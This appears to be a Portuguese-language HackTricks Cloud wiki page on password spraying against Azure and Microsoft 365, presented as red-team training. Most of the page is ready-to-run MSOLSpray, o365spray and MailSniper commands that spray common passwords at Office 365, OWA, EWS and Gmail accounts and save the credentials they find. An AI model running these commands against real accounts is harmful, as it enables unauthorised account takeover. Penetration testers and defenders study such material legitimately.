Português - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

Az - Password Spraying

Aprenda hacking na AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras maneiras de apoiar o HackTricks:

Password Spray

No Azure isso pode ser feito contra diferentes pontos de extremidade da API como Azure AD Graph, Microsoft Graph, Office 365 Reporting webservice, etc.

No entanto, observe que essa técnica é muito barulhenta e a equipe Azul pode facilmente detectá-la. Além disso, a complexidade forçada da senha e o uso do MFA podem tornar essa técnica meio inútil.

Você pode realizar um ataque de password spray com MSOLSpray

. .\MSOLSpray\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\validemails.txt -Password Welcome2022! -Verbose

Ou com o365spray

python3 o365spray.py --spray -U validemails.txt -p 'Welcome2022!' --count 1 --lockout 1 --domain victim.com

Ou com MailSniper

#OWA
Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-sprayed-creds.txt
#EWS
Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile sprayed-ews-creds.txt
#Gmail
Invoke-PasswordSprayGmail -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile gmail-sprayed-creds.txt
Aprenda hacking na AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras maneiras de apoiar o HackTricks:

AnteriorAz - Device Code Authentication PhishingSiguienteAz - Services

Última actualización